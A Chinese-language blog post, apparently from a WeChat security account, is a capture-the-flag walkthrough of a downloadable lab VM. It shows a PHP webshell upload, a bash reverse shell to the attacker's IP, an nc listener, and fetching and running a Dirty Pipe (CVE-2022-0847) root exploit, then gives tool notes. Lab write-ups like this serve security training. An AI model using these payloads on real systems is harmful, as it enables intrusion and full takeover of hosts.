前言:本文中涉及到的技术,只提供思路,严禁用于违法测试
当然哦,跟上次一样,还是用靶机吧,希望大家都保护好自己,哈哈哈
一、靶机地址
公众号后台回复:靶机二,获取靶机地址。要是打不开去公众号主页加我V,我给师傅发。
下载靶机后,双击用vmware打开。
二、靶机渗透
准备一台kali虚拟机,当攻击机。
提前想一下渗透的思路:
信息收集
漏洞验证/漏洞攻击
提权。
1、打开靶场显示的是一个登陆界面。
2、看到这个界面,我们不知道账号和密码,先外网打点。
使用kali中的端口扫描工具:nmap 判断这个靶场地址的ip地址
3、发现存在80端口,我们去通过ip去访问web界面。
4、查看一下端口详细信息
5、没发现什么其他了。
我们现在对它进行目录扫描,看看有没有什么特殊的东西。
robots.txt
graffiti.txt
graffiti.php
一个一个去看
6、可以输入,尝试尝试。
发现了这个,我们去看看txt文件。
发现我的输入都被保存在txt文件中了。
7、抓个包看看,可以不可以传马子。
8、看着还是有点希望哦,有内容,有地址。
二话不说写个马,准备反弹shell。
eval(@$_REQUESTS['password']);
9、放包,去访问1.php文件。
10、发现白屏,八成是上传成功了。我们用webshell连接工具去看看。
11、成功getshell。
我们现在继续利用这个漏洞去反弹shell。
"/bin/bash -c 'bash -i >& /dev/tcp/192.168.211.130/6666 0>&1'"); exec(
注意 需要url编码,然后上传。
12、成功后,注意开启kali的监听。
nc -lvvp 6666
13、访问2.php文件,成功反弹shell。
终于,这下,我们就先自由的玩耍玩耍,看看文件,看看目录,看看用户,添加添加用户,等等。
好了,玩的差不多了,我们就开始提权吧。
先看看当前的版本,可以在中国蚁剑里面操作,也可以利用反弹后的shell进行操作,大家自行选择,都可以。
我在这里就选择了,kali吧,看着舒服点。
14、想着进行suid提权,但是没有什么文件可以利用
find / -perm -u=s -type f 2>/dev/null
想想别的办法了。
先看看他的版本吧。
name -a
系统是Linux4.x|5.x看看有没有漏洞能利用,查查资料,直接发现有漏洞能直接用CVE-2022-0847。
那就使用CVE-2022-0847
在kali上下载
git clone https://github.com/imfiver/CVE-2022-0847.git
要让Dirty-Pipe.sh这个文件到靶机赋权然后执行
然后靶机下载里面的文件
wget http://192.168.211.130:8080/CVE-2022-0847
进行赋权
chmod +x Dirty-Pipe.sh
然后执行
bash Dirty-Pipe.sh
提权成功。
总结:
知识点:
文件上传、
php伪协议、
shell反弹、
漏洞收集脚本的使用、
CVE-2022-0847提权。
对于本次打靶场,我使用了几款好用的几款工具,大家有需要的话,可以保存下载下来,方便以后使用。。。
1.NMAP
Nmap是一款枚举和测试网络的强大工具,有主机探测、端口扫描、版本检测、系统检测以及支持探测脚本编写等功能。
Nmap下载安装地址:
建议不用下载哦,直接去用kali,里面自带的有这款工具。。
2.NC(瑞士军刀)
利用Bash反弹shell,文章中都有写。kali中自带的有nc。
攻击机开启本地监听:
nc -lvvp 6666
目标机主动连接攻击机:
bash -i >& /dev/tcp/***.***.***.***/66660>&1
3.Burp Suite(渗透测试神器)
Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。
所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。
Burp Suite是一个集成化的渗透测试工具,它集合了多种渗透测试组件,使我们自动化地或手工地能更好的完成对web应用的渗透测试和攻击。在渗透测试中,我们使用Burp Suite将使得测试工作变得更加容易和方便,即使在不需要娴熟的技巧的情况下,只有我们熟悉Burp Suite的使用,也使得渗透测试工作变得轻松和高效。
下载地址:
公众号主页回复:bp,获取bp新版工具。
4.中国蚁剑
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。
加载器:
https://github.com/AntSwordProject/AntSword-Loader
核心源码:
https://github.com/AntSwordProject/antSword
关于如何安装,大家可以自行搜索。
以上为我的一些做题笔记,大佬勿喷。
感谢各位大佬们关注LHACK安全,正在努力的进步中,后续会坚持更新渗透漏洞思路分享、好用工具分享以及挖掘SRC思路等文章,希望能得到各位师傅们的关注与支持。以下是交流群,欢迎进群交流。
原文始发于微信公众号(LHACK安全):渗透实战(二)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论